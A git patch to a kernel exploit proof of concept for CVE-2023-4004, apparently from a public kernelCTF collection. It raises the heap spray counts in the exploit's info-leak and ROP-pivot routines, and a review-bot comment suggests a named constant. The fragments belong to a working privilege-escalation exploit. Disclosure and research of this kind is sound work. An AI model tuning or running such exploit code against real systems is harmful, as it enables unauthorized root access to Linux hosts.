From cc583e8f9d0fa005f1a1a17f937a7164859cdde5 Mon Sep 17 00:00:00 2001
From: lonial con
Date: Tue, 12 Sep 2023 19:17:03 +0800
Subject: [PATCH] Change cos exploit
---
 .../exploit/cos-105-17412.101.17/exploit.c | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c
index 3f254b06..9c01fc7f 100644
--- a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c
@@ -204,11 +204,11 @@ int leak_info(struct nl_sock * socket){
 new_setelem(socket,SET_TABLE,set_name,a,0x88+3);
 elem_flush(socket,SET_TABLE,set_name);
 puts("Start spray tables");
- spray_tables(socket,0x400, a, 0xd8);
+ spray_tables(socket,0x600, a, 0xd8);
 puts("Finish spray tables");
 elem_flush(socket,SET_TABLE,set_name);
 puts("Start spray objects");
- spray_objects(socket, 0x400);
+ spray_objects(socket, 0x600);
 puts("Finish spray objects");
 nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_table, NULL);
@@ -283,11 +283,11 @@ int jump_to_rop(struct nl_sock * socket){
 elem_flush(socket,SET_TABLE,set_name);
 puts("Start spray tables");
- spray_tables(socket,0x400, a, 0xd8);
+ spray_tables(socket,0x600, a, 0xd8);
 puts("Finish spray tables");
 elem_flush(socket,SET_TABLE,set_name);
 puts("Start spray objects");
- spray_objects_with_udata(socket, 0x400, ops, 0x100);
+ spray_objects_with_udata(socket, 0x600, ops, 0x100);
 puts("Finish spray objects");
 nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_table, NULL);
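Review bot: The count is a bare literal repeated in both calls of the `leak_info` hunk (`spray_tables(socket,0x600, a, 0xd8)` and `spray_objects(socket, 0x600)`), and the same pair recurs in the `jump_to_rop` hunk, so four sites have to be edited in step whenever the value changes. Defining it once, e.g. `#define SPRAY_COUNT 0x600`, and passing `SPRAY_COUNT` at all four sites would remove that coupling. The commit message gives no reason for moving from 0x400 to 0x600, so a one-line comment on the constant is where a reader analysing this PoC would expect the rationale. Whether the table and object counts must stay equal is not visible in the hunks; if they need not, two named constants would be clearer. Both `leak_info` and `jump_to_rop` continue outside their hunks.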